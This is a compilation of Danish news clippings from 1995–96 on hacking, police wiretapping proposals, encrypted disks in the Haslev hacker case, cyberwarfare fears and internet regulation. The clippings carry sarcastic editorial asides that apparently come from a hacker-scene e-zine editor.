fremtidens elektroniske skatteberegning m†ske kommer til at se ud. Her kan man
taste sine skatteoplysninger ind, og umiddelbart f† lavet en beregning, der
viser hvor meget, man burde havde betalt i skat.

        Indtil videre er skatteberegningen kun lavet for almindelige l›nmodtag-
ere, og man skal selv taste alle oplysninger ind. Kigger man lidt i krystal-
kuglen og bladrer lidt hastigt i sin kalender, er det ikke sv‘rt at se, hvordan
fremtidens ligning kommer til at se ud: N†r man en dag checker sin e-mail, vil
der ligge en e-mail fra Told og Skat med en forel›big skatteberegning. Man bli-
ver anmodet om at checke tallene p† selvangivelsen og eventuelt p†f›re rettel-
ser eller manglende oplysninger. Du trykker p† en tast og sender dermed din
selvangivelse retur til Told og Skat - uden et eneste stykke papir involveret.





                              Tal trygt i telefon
                 MobilMagasinet, Susanne Bloch - November 1995
                                 Af Clive Sharp

        Hvad man taler om i telefonen, kommer ikke andre ved. Tele Danmark Mo-
bil gemmer kun de oplysninger, der danner grundlag for telefonregningerne.

        Det ville v‘re en uhyggelig tanke, hvis alt, hvad der blev udvekslet af
tale over telefonen, blev optaget p† b†nd, s† f.eks. myndighederne kunne aflyt-
te samtaler, der blev f›rt †r tilbage. Ingen samtaler bliver imidlertidig op-
taget. Derimod gemmer Tele Danmark Mobil oplysninger om, hvilken telefoner der
har ringet sammen i de sidste fem †r. Hvorn†r opkaldene fandt sted, og hvor
l‘nge de varede. Man kan ogs† se, om opkaldet har krydset landegr‘nser. Uden
alle disse oplysninger ville det ikke v‘re muligt at udskrive korrekte regnin-
ger til kunderne.

        P† GSM-telefoner kan man envidere se, hvilken sendemast der har opfan-
get opkaldet fra GSM-telefonen. Sendemasterne opfanger dog samtaler i helt op
til en radius af 50 km., s† det er ikke muligt at udpege det pr‘cise sted, hvor
telefonen befandt sig under opkaldet. Oplysningerne fort‘ller kun, hvilken
telefoner der har ringet sammen - ikke hvilken personer, der har talt i dem.
- Vi gemmer oplysningerne i fem †r af regnskabstekniske †rsager. Loven kr‘ver,
at alle virksomheder gemmer materiale, der ligger til grund for regnskabet,
siger planl‘gningschef i Tele Danmark Mobil, Susanne Andersen.

        FORBRYDELSER.
        Ved opklaring af forbrydelser er politiet af og til interesserede i at
f† Tele Danmark Mobil til at oplyse hvilke opkald, der er blevet foretaget fra
eller til en mist‘nkts mobiltelefon. -Politiet skal fremvise en dommerkendelse,
f›r vi udleverer oplysningerne. Det er kun i forbindelse med alvorlige forbryd-
elser, med strafferammer p† seks †rs f‘ngsel eller mere, at dommerkendelser
overhovedet kommer p† tale, siger Susanne Andersen. En dommerkendelse kan dog
ogs† opn†s ved mindre alvorlige forbrydelser. Med det kr‘ver, at mobilkunden
selv giver tilladelse til, at politiet m† unders›ge oplysningerne om samtal-
erne. -Vi har en meget stram holdning til hvorn†r og hvilke oplysninger, vi ud-
leverer. Selvom en af vores kunder har givet sit samtykke til, at politiet m†
s›ge oplysninger, s† udleverer vi dem f›rst til politiet, n†r der foreligger en
dommerkendelse, siger Susanne Andersen.

        SIKKERHED.
        Oplysningerne om samtalerne ligger gemt p† CD'er, og der er kun f† med-
arbejdere, der har adgang til at l‘se dem. S† snart de er over seks m†neder
gamle begr‘nses adgangen yderligere. -Det er en sikkerhed for kunderne at vi
har mulighed for at g† tilbage og unders›ge deres telefonregninger, hvis der
f.eks. er mistanke om fejl. Vi bruger ogs† oplysningerne til at beregne stati-
stik og til at skaffe os viden om, hvor i landet der er mest trafik, og hvor
der er st›rst behov for bedre d‘kning for mobiltelefoner, siger Susanne Ander-
sen.





               Et sp›rgsm†l om timing at opdage datakriminalitet
                David Svarrer, ComputerWorld - 3. November 1995
                                 Af Clive Sharp

        Slet blot mist‘nkelige, krypterede data. Mads Bryde Andersen er varm
fortaler for, at der nu skal brydes med gammel retspraksis i datasager. Men hr.
Andersens argumenter holder ikke vand: Den datakriminelles ulovlige p†virknin-
ger af hans omverden m†, sammen med bevis for, at det er netop d‚n kriminelle,
udg›re det samlede bevismateriale.

        INGEN PROBLEMER.
        S†fremt den kriminelle anvender krypterede data, er de p† et eller
andet tidspunkt ukrypterede under vedkommendes omgang med dem. Det er s†ledes
et sp›rgsm†l om timing af efterforskningen at skaffe bevismateriale. Det er
underordnet, om den datakriminelle f›r, under eller efter beg†elsen af hand-
lingen har krypteret hele eller dele af materialet. Det er op til efterforsk-
ningen at dokumentere, hvem der har gjort det, og hvad der er foretaget.
Almindelig efterforskningspraksis har ingen problemer her. Kun aflytningskrit-
erierne er det her n›dvendigt at ‘ndre p†. Interessant kunne det v‘re, hvis en
formodet datakriminel, der krypterede sine data, i stedet blot ved dom fik
disse slettet. Hvis den formodede datakriminelle ikke kender hverken kode,
ophav eller destination til disse data, kan de jo heller ikke anvendes af ved-
kommende, eller viderebringes til andre, og kan da med fordel for vedkommende
slettes.

        GLEMTE PASSWORDS.
        Der er mange edb-brugere, der glemmer deres passwords, eller hvilken
kode, de har krypteret en eller anden pakke med. Hvad ville der ske, hvis myn-
dighederne fandt fem krypterede filer hos kriminelle Kurt, og Kurt kun reelt
kunne huske koderne til fire af de fem filer? Lad os endvidere antage, at disse
fire filer reelt indeholder belastende materiale. Det forhold, at den sidste
fil er krypteret, og at Kurt ikke kan huske koden, og at de fire ›vrige filer
belaster Kurt, kan ikke danne noget retsgrundlag for at sk‘rpe en straf mod
Kurt for en gammel tekstfil, han krypterede p† et eller andet tidspunkt. Der
skal m†ske blot en ‘ndring til af lov om aflytning, s†ledes at der kan aflyttes
p† begrundet mistanke om informations-kriminalitet.

        KONFISKERING.
        Man kunne ogs† ‘ndre straframmen for datatyveri og duplikering, s† de
kom p† linie med falskm›ntneri for s† vidt angik tyveri af kreditkort-numre, p†
linie med krybskytteri, for s† vidt angik tyveri af data, mv. Falskm›ntneri
straffes med op til 10 †r f‘ngsel. Krybskytter kan f† konfiskeret den bil, de
har anvendt til hjemtransport af fangsten, foruden naturligvis v†ben, ammuni-
tion og andet udstyr. Enhver kriminalsag mod en formodet kriminel b›r kunne
afg›res p† de i sagen fremlagte bevisligheder og ikke afh‘nge af den formodede
kriminelles st›rre eller mindre samarbejde. Strafferammerne for kriminalitet er
s‘dvanligvis fastlagt som et takstsystem med rabat, og man kunne jo blot her
tilf›je rabat for samarbejde omkring opklaringen - men det er jo praksis aller-
ede, s† hvori forbedringen i hans omvendte bevisbyrde skulle best†, m† Mads
Bryde Andersen godt forklare.





                             Forbrydelsens hovedvej
                Jyllandsposten, Niels Sand›e - 13. November 1995
                                 Af Clive Sharp

        Computere og Internettet er grundlag for en ny gyserfilm. Alle data om
Danske borgere er gemt p† computere. Via telefonkabler kan de i varierende ud-
str‘kning hentes frem og ‘ndres af autoriserede personer lige fra politibetj-
ente til skattefunktion‘rer. Den virkelighed er baggrundskulissen for den nye
amerikanske gyser Nettet, hvor Internettet er forvandlet til forbrydelsens
hovedvej.

        ONDE N‌RDER.
        I mods‘tning til vores opfattelse af en kontrolleret virkelighed med
computere omgivet af n‘sten fuldt hacker-sikrede brandmure truer de onde n›rder
med n‘sten at overtage kontrollen i Nettet. Deres v†ben er et program gemt i et
tilsyneladende uskyldigt spil. Programmet giver adgang til ellers topsikrede
databaser sp‘ndende fra FBI's registre til det amerikanske atomenergiudvalg.
Faktisk er det alt†bnende program p† vej til at blive indf›jet i netop de EDB-
brandmure [er det Firewalls som han kalder EDB-brandmure??], der skal sikre de
mest f›lsomme databaser mod u›nsket bes›g og manipulering.

        Filmens hovedperson er den billedsk›nne n›rd Angela Bennett, hvis ene-
ste venner holder sig gemt bag tegnede figure p† Internettet med navne som Cyb-
erbob og Cinderella. I hendes verden er driften mod at spise ude blevet ersta-
ttet med at bestille pizza over internettet. Og den eneste kontakt til arbejds-
pladsen er telefonen, mens Angela Bennetts direkte menneskelige forbindelse til
omverden begr‘nser sig til bes›g hos sin demente mor.

        OPSPORER EDB-VIRUS.
        I sit professionelle liv er Angela Bennett, spiller af Sandra Bullock,
den bedste systemanalytiker i firmaet Cathedral Software. Hendes arbejdsplads
er hendes hus, hvorfra hun sidder og opspore EDB-virus skjult i spil og hacker
ind i tilsyneladende sunde EDB-systemer. Det er en af hendes kolleger, Dale
Hessman, fra Cathedral Software, som vender op og ned p† Angela Bennetts liv
ved at sende hende en diskette med et tilsyneladende uskyldigt program. Her
gemmer sig n›glen til p† forunderlig vis at hacke sig ind i selv de tilsynelad-
ende mest sikre databaser. Opdagelsen f†r Dale Hessman til at flyve op til Ang-
ela Bennetts hjem, for at de sammen kan unders›ge den mystiske software.

        Men de onde n›rder er kommet undervejs med opdagelsen. De f†r hacket
sig ind i luftfartskontrollens database og narre ad den vej myndighederne til
at give Dale Hessman forkerte flyveinstrukser. Det fatale resultat er en direk-
te kollision mellem nogle h›je californiske industriskorstene. Fra det ›jeblik
starter en gyser, der kommer fuldt p† omdrejningsh›jde med de mest uhyggelige i
den mere traditionelle gysergenre. De obligatoriske mord, forf›lgelser og psy-
kologiske sp‘ndingsmomenter er blot peppet op med mulighederne for at manipul-
ere med personlige data. Et uhyggeligt krydderi, der i politiets arkiver for-
vandler Angela Bennett til en forfulgt narkoforbryder med et andet navn, mens
en ond n›rd overtager Angela Bennetts navn og identitet.

        PREMIERE I WEEKENDEN.
        Filmen havde i weekenden premiere i en r‘kke danske biografer. Nettet
er instrueret af Irwin Winkler, der i sin lange karriere har modtaget 12 Osc-
ars, herunder for medvirken til film som Rocky og GoodFellas. Den gode n›rd
Angela Bennett er blandt andet kendt for filmene Speed og Mens du sov.





                       Politiet sl†s med krypterede diske
                       ComputerWorld - 17. November 1995
                                 Af Clive Sharp

        Fors›g p† at bryde n›gler til krypterede dokumenter i stor hackersag er
indtil videre endt uden resultat.

        Efterforskningen i den store hackersag, ogs† kendt under navnet Haslev-
sagen, st†r i stampe p† vigtige omr†der, fordi politiet indtil videre ikke har
v‘ret i stand til at bryde koderne til en r‘kke krypterede filer p† de sigtedes
harddiske. Vicekriminalkommiss‘r Preben Andersen fra Rigspolitiets Rejsehold
oplyser overfor ComputerWorld, at de sigtede hackere generelt har krypteret
deres diske, og at det ikke er lykkedes politiet at kn‘kke koderne ved at tr‘-
kke p† hj‘lp fra "g‘ngse ressourcer".

        KAPL‌B MED TIDEN.
        - Problemet er beklageligvis, at det jo ikke er til at bryde det skidt.
De instanser, der skulle hj‘lpe os og som skulle have ekspertisen, har meldt
fra. Vi satser dog fortsat p†, at det skal lykkes og i ›jeblikket arbejder vi
med en partner, der fors›ger at kn‘kke koderne efter et nyt koncept, siger
Preben Andersen. Politiet har ikke tidligere villet oplyse, om der var fundet
krypterede filer p† de sigtedes harddiske eller ej. Efter en af de sigtede i
sagen for et par uger siden stod offentligt frem og fortalte, at han havde
hentet krypteringsprogrammer p† Internet og sikret en del af filerne p† sin
computer, indr›mmer politiet imidlertid, at hackerne generelt har benyttet
krypterings-programmer, og at hackerne har v‘ret koldblodige nok til at lade
v‘re med at give politiet de n›gler, der kunne dekryptere en r‘kke filer.

        Politiets fors›g p† at dekryptere dokumenter fra hackernes harddiske er
i en vis udstr‘kning et kapl›b med tiden. Forel›big har opklaringsarbejdet
st†et p† i over to †r og sagerne ventes i ›jeblikket tidligst at kunne blive
berammet til engang i l›bet af f›rste eller andet kvartal i 1996. Politiets
tidsproblem er, at alt for langstrakt politiarbejde vil tr‘kke i retning af
mildere afg›relser. P† den anden side vil det v‘re af is‘r stor politisk v‘rdi
for politiet at kn‘kke koderne p† grund af det signal, man dermed vil sende
hacker-milj›et.
--------
Det eneste "signal" man vil sende hackermilj›et er, at vi skal finde nogle
st‘rkere krypteringsprogrammer (hvis de alts† bliver kn‘kket).





                         Virus fra Internet i karant‘ne
                         Politiken - 14. December 1995
                                 Af Clive Sharp

        Computervirus er en del af livet i cyberspace. Men s†dan beh›ver det
ikke at v‘re. Anti-virus-firmaet McAfee, hvis virusudrydningsv‘rkt›jer [man
tror at det er l›gn] er v‘rdsat af alle computerbrugere over den ganske klode
[NOT!], har udviklet et nyt beskyttelsesprogram, som s›rger for, at downloadede
filer kommer i "karant‘ne", indtil de er blevet forsvarligt set efter i s›mm-
ene for virus. Produktet hedder WebScan og kan genkende mere end 6.000 forskel-
lige computervira. B†de de klassiske og de nye ondsindede makro-vira, der
blandt andet gemmer sig i Word-dokumenter. Desuden kan WebScan unders›ge kom-
primerede filer i de fleste anvendte pakkeformater. Interesserede kan hente sig
en testversion fra blandt andet DanaDatas BBS p† telefon 86 78 31 34 eller p†
Web-adressen http://www.macafee.com. Priserne for den registrerede version af
produktet er for private 580 kroner for et †rs abonnement, mens virksomheder
m† af med 4.800 kroner for en to-†rig 10-brugerlicens. Priserne er inklusive
opdateringer.





                          Den elektroniske akillesh‘l
              ComputerWorld, Christian Harbou - 15. December 1995
                                 Af Clive Sharp

        Et hvilkent som helst samfund er ikke mere end tre m†ltider mad fra en
revolution. Kommer der ikke f›devarer ud i butikkerne i tre eller flere dage,
vil samfundet opleve massive sociale uroligheder. Folk vil give sig til at
overfalde og udplyndre hinanden for simpelthen at f† mad p† middagsbordet.

        Der er derfor en vis mening i at se p†, hvilken trusler mod forsynings-
sikkerhende, der gemmer sig i et moderne samfund. Slagtekyllinger i fryseren,
telefonforbindelser ud af huset og nyheder p† tv er nogle af de goder, som det
moderne menneske tager fuldst‘ndigt givet. Men forsyningerne af stort set alle
moderne forn›denheder viser sig ved n‘rmere eftersyn at bero p† en ganske best-
emt parameter - nemlig brugen af edb. Edb-systemerne udg›r samfundets akilles-
h‘l. Hvis blot et par af de helt store og f›lsomme edb-systemer g†r ned, kan
det s‘tte hele samfundet i st†. Lufttrafikken er afh‘ngig af computere. Beta-
lingssystemer bygger p† computere. Selv bryggeriernes returflaskesystem er bas-
eret p† computere og ville bryde sammen, hvis computerne holdt op med at fung-
ere. If›lge direkt›r i Instituttet for Datasikkerhed, Jan [S›nderbo] Carlsen,
stiger afh‘ngigheden og dermed f›lsomheden over for fejl i computersystemerne,
med samme fart som systemerne udbygges. Men indtil videre har det ikke vundet
geh›r rent politisk, at udbygningen af computersystemerne skaber en sikkerheds-
m‘ssig risiko for befolkningen. -Man kunne forestille sig en lammelse af store
betalingssystemer. For eksempel postgiroen, der †rligt formidler betalinger til
en v‘rdi af mange, mange milliarder kroner. Eller man kunne forestille sig eff-
ekten af en lammelse af SWIFT-systemet, der formidler alle betalinger til og
fra udlandet. Med lammede betalingssystemer ville for eksempel distributionen
af ganske almindelige dagligvarer hurtigt g† i st†, oplyser Jan [S›nderbo]
Carlsen og tilf›jer: - I Danmark har vi m‘rkeligt nok aldrig f†et gennemf›rt en
s†rbarhedsanalyse. Svenskerne og nordm‘ndene har tidligere lavet s†rbarhedsana-
lyser, der ganske vist mest gik p† forsyningssikkerheden. Formanden for reger-
ingens IT-sikkerhedspolitiske udvalg, Mads Bryde Andersen, er enig i, at en
s†rbarhedsanalyse b›r gennemf›res. - Det vil v‘re et naturligt emne for IT-
sikkerhedsr†det, dog ikke p† det f›rste m›de. Der er i forvejen utallige emner,
der melder sig. Hvis vi begyndte med at interressere os for s†rbarheden i de
civile systemer, ville det svare til, at folk, der tager sig af f‘rdselssikker-
heden, gav sig til at se p† risikoen for, at der blev smidt en bombe midt p†
motorvejen i stedet for at se p† sp›rgsm†l om bremser og sikkerhedsseler, siger
Mads Bryde Andersen.

        S†rbarheden af computersystemerne opst†r, fordi de oprindelige systemer
elimineres i takt med at computeren overtager arbejdet. Samfundet br‘nder bro-
erne bag sig. N†r institutioner g†r over til elektronisk sagsbehandling, er der
nemlig ingen grund til at f›re dobbelt administration. Papirer og dokumenter
forsvinder, og p† et givet tidspunkt findes der kun elektronikken og det f‘lles
net. Den situation har skabt to nye opgaver for den moderne efterretningstjen-
este. I et land som Danmark vil efterretningstjenesten have en naturlig opgave
i at kategorisere og udt‘nke et forsvar for de s‘rligt f›lsomme edb-systemer.
Og det vil ikke kun handle om milit‘re installationer, men ogs† om civile.
Civile edb-installationer vil for det f›rste udg›re naturlige m†l for fjendt-
lige angreb i den periode, der ligger forud for en egentlig krise. Men ogs†
efter udbrudet af en krig vil civile edb-systemer v‘re i s›gelyset. Det vil
nemlig ikke nytte noget at have F-16 jagere i luften og Tiger-tanks p† jorden,
hvis befolkningen sl†s i gaderne for at skaffe sig det allermest n›dvendige
[Tiger-tanks???? Jeg er bange for, at den k‘re Christian Harbou ikke ved s†
meget om det milit‘re system. Tiger-"tanken" var en "tank" som blev brugt af
tyskerne under 2. verdenskrig, og den findes IKKE mere. Idag har det Danske
forsvar en Leopard-kampvogn, som er en af verdens bedste kampvogne. Den kommer
fra Tyskland og s† hedder det en kampvogn og IKKE en tank -red]. I st›rre
lande, eksempelvis i Storbritannien, Frankrig og USA, vil efterretnings-
tjenesterne desuden skulle finde metoder til at lamme fjendtligtsindede natio-
ners computersystemer [Og hvorfor skal vi s† ikke det i Danmark?? -Red].

        De to Danske efterretningstjenester er ikke til at hive oplysninger ud
af p† dette felt - fuldst‘ndigt ligesom efterretningstjenesterne var knappet
til for blot halvandet †r siden i sp›rgsm†let om de krypterings-teknikker, der
en gang for alle har sat tjenesterns aflytningssystemer ud af spil [Men ER de
nu sat ud af spillet? Det tror jeg ikke -Red]. Men amerikanske efterretnings-
officerer har udtalt offentligt, blandt andet til bladet TIME [Fedt, USA's svar
p† Billed-bladet -red], at der forskes i computerkrig, b†de med henblik p† at
forsvare sig og med henblik p† at lamme eventuelle fjender. Desuden tr‘kker
internationale konferencer om datasikkerhed for tiden deltagere fra efterret-
ningstjenesterne til huse. Og fra disse sammenkomster er det ret almindeligt,
at der slipper oplysninger ud til civilbefolkningen [Ja, for selvf›lgeligt
sidder folkene fra efterretningstjenesterne og diskuterer deres hemmelige pro-
jekter med ganske tilf‘ldige civile folk! Eller ogs† g›r de ikke. -red]. En af
de mere ber›mte historier, der verserer i ›jeblikket, handler om, at amerikan-
erne under Golfkrigen havde held til at lamme dele af Sadam Husseins milit‘r-
apparat ved at plante virus eller "orm" i systemerne gennem forudprogrammerede
chips, som blev sendt ind i Irak med franskproducerede printere. - Historien
om amerikanernes computerangreb p† Irak er helt ubekr‘ftet. Men omvendt ved vi,
at det kan lade sig g›re at lamme computersystemer med virus eller s†kaldte
worms [Der er sku' forskel p† en virus og en worm -red]. Det bekr‘ftes ikke
mindst af historien om den amerikanske antivirus-professor s›n, der lavede en
worm, som var i stand til at l‘gge 10.000 Unix-maskiner ned p† en eftermiddag,
siger Jan [S›nderbo] Carlsen [Jeg tror ikke at Morris senior er antivirus-pro-
fessor, men p‘nt fors›g -red]. - N†r hackere kan finde ud af at bryde ind i
vitale edb-installationer, s† m† det uv‘gerligt f† efterretningstjenesterne til
at t‘nke, at den samme teknik kan bruges m†lrettet af andre, tilf›jer han.

        If›lge Jan [S›nderbo] Carlsen vil der typisk v‘re tre metoder til at
s‘tte computersystemer ud af drift. Mandskabsm‘ssigt vil det v‘re n‘rliggende
at uddanne s‘rlige korps, der er specialiseret i at hacke [EKKMP anyone? -red].
V†benarsenalet vil tillige kunne omfatte s‘rlige EMP-kanoner, alts† v†ben, der
retter en st‘rk elektromagnetisk impuls mod et computersystem. If›lge en ar-
tikel i TIME fra dette efter†r, kan en EMP-kanon gemmes i en kuffert. Et EMP-
bombardement af en computer vil i princippet overfodre systemet med oplysninger
som f›rer til at computeren bryder sammen. V†bnet kan affyres b†de lydl›st og
usynligt tv‘rs igennem en mur, hvis det skulle v‘re. Endelig er der muligheden,
at bestemte nationer benytter sig af at v‘re p† hjemmebane, n†r det handler om
computere. -Det vil v‘re n‘rliggende for de lande, der ligger foran i produk-
tionen af computere, at indbygge skjulte funktioner i forskellige komponenter,
s† det senere kan lade s† g›re at f† kontrol med computersystemerne p† afstand.
Det ville i hvert fald v‘re m‘rkeligt, hvis chefer i de amerikanske efterret-
ningetjenester ikke i det mindste stillede forslag om at g›re fors›get, siger
Jan [S›nderbo] Carlsen. Computerkrigen, hvor et stort, vestligt land angriber
en lille nation som Danmark, er nok det mindst sandsynlige scenario af alle.
Den version af computerkrig, der helt konkret giver anledning til nerv›sitet,
og som har v‘ret beskrevet i den amerikanske presse, handler derimod om fattige
nationers angreb p† vestlige landes vitale systemer. En misundelses-krig eller
en form for krig, der har til form†l at l‘gge pres p† vestlige lande for even-
tuelt at sikre et milit‘rdiktatur fred. - Uddannelsen af s‘rlige hackerkorps
koster ikke tiln‘rmelsesvis s† meget som for eksempel udviklingen af atomv†ben.
Desuden kan det forg† i det skjulte. En h‘r af hackere, der sendes ud i verden,
vil kunne angribe et vestligt land fra alle mulige lokaliteter, uden risiko for
at blive sporet og tilintetgjort [Hmmmm hvis en normal hacker kan spores, hvor-
for kan en hacker fra forsvaret s† ikke?? -red]. Angrebsvejene er kommunikati-
onsforbindelser ind og ud af landene. Og det kan ikke lade sig g›re at lukke
ned for telefonforbindelserne, der forbinder et land med omverden, siger Jan
[S›nderbo] Carlsen [Hmmm, det virkede da rimeligt godt for USSR, og hvis man
har pr›vet at ringe til ex-Jugoslavien de sidste 2-3 †r, s† vil man kunne se,
at det ogs† virkede ganske godt der -red]. Hans pointe er, at der vil v‘re god
grund til at se p† civile edb-systemers sikkerhed mod angreb. Milit‘re anl‘g er
i forvejen klassificeret i forskellige kategorier og s‘rligt vigtige milit‘re
anl‘g er sikret mod angreb med elektromagnetiske str†ler. Jan [S›nderbo] Car-
lsen ser s†ledes gerne, at civile anl‘g kategoriseres, og at en r‘kke krav til
sikkerheden p† et tidspunkt kommer til at udspringe af det enkelte edb-anl‘gs
betydning for samfundet.
--------
Ham der har skrevet denne artikel er en taber! Han ved intet om intet! Alle
hans "h†rde" facts kommer fra TIME, og hvor fedt er det? Det lyder desuden som
om at Jan S›nderbo Carlsen har l‘st Information Warfare (anmeldt i dette num-
mer), for alt hvad han siger (og mere til) st†r i den bog.





                            H†rdere kurs mod hackere
             Berlingske Tidende, Henrik Larsen - 21. December 1995
                                 Af Clive Sharp

        Aflytning: Lovforslag vil give politiet ›get adgang til at telefon-
aflytte hackere. God id‚, siger Bagmandspolitiet. Mange firmaer anmelder ikke
fors›g p† indbrud i deres EDB-systemer.

        Fremover skal det v‘re lettere for politiet at telefonaflytte personer,
der ved hj‘lp af en hjemmecomputer koblet til telefonnettet pr›ver at skaffe
sig adgang til oplysninger i EDB-systemer hos firmaer og institutioner. En
elektronisk indbrudsform, der i fagsproget kaldes hacking. Det er et af de cen-
trale punkter i et lovforslag, som Justitsministeriet er ved at l‘gge sidste
h†nd p†. I sager om hacker-virksomhed vil forslaget oph‘ve den nuv‘rende regel,
der siger, at telefonaflytning som udgangspunkt kun kan finde sted ved mistanke
om forbrydelser som kan straffes med mindst seks †rs f‘ngsel. Mist‘nkes en per-
son for at v‘re hacker, skal politiet efter forslaget fremover kunne f† en
dommerkendelse til at aflytte vedkommendes telefon - hvis politiet vel og m‘rke
kan sandsynligg›re, at der foreg†r noget ulovligt.

        Forslaget kommer til behandling i dette folketings†r. Vedtages det, vil
politiet langt om l‘nge kunne gribe effektivt ind over for hackere, siger
kriminalkommis‘r Henning Jensen, Bagmandspolitiet. "Bliver et firma i dag
angrebet af en hacker, giver loven udelukkende os mulighed for at installere et
s†kaldt fastholdeanl‘g [nogen der kendet noget til det?]. Det kan spore det
nummer, der ringes fra - og s† kan vi naturligvis tage en snak med abonnenten.
Problemet er bare, at hackere typisk fors›ger at komme ind i en lang r‘kke for-
skellige datasystemer, og den totale aktivitet kan vi kun f† kendskab til ved
at aflytte hackernes telefon".

        Hvor aktive Danske hackere er, har myndighederne ikke noget pr‘cist
billede af, siger Henning Jensen. "Siden 1984 har vi haft 15 egentlige sager -
hvor flere har drejet sig om tusindvis af fors›g p† at bryde ind i EDB-system-
er. Men det reelle problem er langt st›rre end antallet af sager kunne tyde p†.
I mange tilf‘lde bliver det bare ikke anmeldt -  ofte fordi firmaet v‘lger at
lukke hackerne ude ved at installere ekstra sikkerhedsudstyr".
---------
Hmmmm, det begynder at se lidt sort ud for os, hvis denne lov kommer igennem.
Jeg er is‘r meget interesseret i hvilken kriterier der g‘lder for "... hvis
politiet vel og m‘rke kan sandsynligg›re, at der foreg†r noget ulovligt".
Udfra dette kan man jo sige, at det er sandsynligt, at alle dem der ringer til
et H/P/A/V/C board, er inde i noget ulovligt. Skal de allesammen have aflyttet
deres telefon? Denne udvikling bliver sp‘ndende at f›lge.





                              Aflytning af hackere
                           Politiken - 4. Januar 1996
                                 Af Clive Sharp

        Justitsministeriet er ved at l‘gge sidste h†nd p† et lovforslag, der
skal g›re det lettere at aflytte hackernes telefoner. I dag kan politiet kun
f† tilladelse til at aflytte telefoner, hvis der er begrundet mistanke om en
forbrydelse, som kan give mindst seks †rs f‘ngsel. Men hackernes aktiviteter
sk›nnes †benbart at v‘re s† besv‘rlige at efterforske, at Justitsministeriet
vil have oph‘vet denne regel.





                                Angreb p† Nettet
                           Politiken - 4. Januar 1996
                                 Af Clive Sharp

        Under overskriften 'Omfattende angreb p† nettet' advarer Computer
Emergency Response Team (CERT), at der inden for det sidste stykke tid er sket
en dramatisk stigning i hackingfors›g over Internettet. Og en stor del af for-
s›gene er succesfulde. Alle hackingangrebene bruger kendte svagheder i Internet
computersystemer - svagheder, der relativt nemt kan rettes, for eksempel ved at
opgradere software. De succesrige hackingfors›g giver hackeren fri adgang til
alt i systemet.





                       Minister afviser Dansk net-politi
                Politiken, Michael Berg Larsen - 11. Januar 1996
                                 Af Clive Sharp

        Forskningsminister Frank Jensen mener ikke, at der er behov for et
Dansk net-politi til at efters›ge ulovligheder p† Nettet. I USA debatterer man
for tiden voldsomt om Internettet skal p†l‘gges restriktioner. Specielt den
amerikanske h›jrefl›j mener, at alt hvad der er anst›deligt p† Nettet, skal
forbydes. Endnu er lovforslaget, Communications Decency Act, ikke vedtaget.
Fornyligt lukkede den store, amerikanske online-tjeneste CompuServe i panik
mere end 200 nyhedsgrupper efter pres fra anklagemyndigheden i Bayern, der var
p† jagt efter h†rd porno p† CompuServe. I en lang r‘kke andre lande har man
allerede vedtaget love, der begr‘nser ytringsfriheden p† Internettet. Eller
ogs† overvejer man det kraftigt. Forskningsminister Frank Jensen mener dog ikke
at der er brug for et net-politi i Danmark. Han mener, at den Danske lovgivning
er fuldt tilstr‘kkelig til at klare eventuelle ulovligheder med Dansk udspring
p† Nettet - uanset om det drejer sig om ophavsretsstridigheder, racistiske yt-
ringer eller andre lovstridige informationer. Frank Jensen p†peger endvidere,
at vi i Danmark  hidtil har v‘ret meget imod at indf›re regler, der smager af
censur, og pornografien er jo som bekende frigivet.

        PERSONLIGT ANSVAR.
        Samtidig understreger ministeren, at vi i Danmark har en anden opfa-
ttelse af det personlige ansvar. Og at han ville have det meget sv‘rt ved at
skulle agere smagsdommer og bestemme, hvad der i givet fald skulle forbydes.
- Det m† v‘re folks eget ansvar, hvad de v‘lger at enten kigge p† eller l‘se.
Og jeg vil g† meget langt i forsvaret for de personlige rettigheder, siger
Frank Jensen. -Et s‘rligt problem kan v‘re mindre†riges brug af Internettet,
siger ministeren. Frank Jensen mener dog, at det m† v‘re for‘ldrenes ansvar, og
at de eventuelt kan sikre computerne med en form for l†s. - Jeg er derfor som
udgangspunkt ikke indstillet p† at regulere p† omr†det, f›r der opst†r konkrete
problemer, siger ministeren.

        REKLAMEREGLER.
        Forskningsministeren har dog i en ny lov om forhold p† telekommunika-
tionsomr†det sikret sig mulighed for administravtivt at bestemme, at de regler,
der g‘lder for radio og fjernsynsvirksomhed om reklamer og sponsorering, ogs†
kan komme til at g‘lde for Internettet. Det vil sige, at der kan komme begr‘ns-
ninger, hvis online-tjenesterne enten gengiver reklamer for medicin, spiritus,
tobak eller publicerer ekstrem vold og porno, der er i konflikt med Dansk lov-
givning. I givet fald vil det v‘re Telestyrelsen, der skal agere Net-politi.
Ministeren har dog endnu ikke gjort sig nogle tanker om, hvordan det i praksis
skulle g† for sig. - Det er ganske vanskeligt p† forh†nd at sige noget om,
hvordan det kunne komme til at foreg†. En endelig udm›ntning m† ske p† baggrund
af de eventuelle ulovligheder, der i givet fald m†tte dukke op. Men jeg mener,
at vi rent lovgivningsm‘ssigt er kl‘dt godt p†, hvis der skulle blive proble-
mer, siger Frank Jensen.

        INTERNATIONALT SAMARBEJDE.
        Men den Danske lovgivning r‘kker ikke ud over landets gr‘nser. Og der
kan opst† problemer, hvis der for eksempel fra en tysk computer udsendes infor-
mationer, der kr‘nker Dansk lovgivning. Forskningsminister Frank Jensen er klar
over, at en effektiv begr‘nsning er meget vanskelig at gennemf›re, da Internet-
net jo er globalt. Han mener, at det problem kun kan l›ses i internationale
fora. - Fra Dansk side er vi meget †bne over for et internationalt samarbejde,
og jeg kan sagtens forestille mig, at det inden alt for l‘nge kommer p† dags-
ordenen i EU, siger Frank Jensen.





ENDEX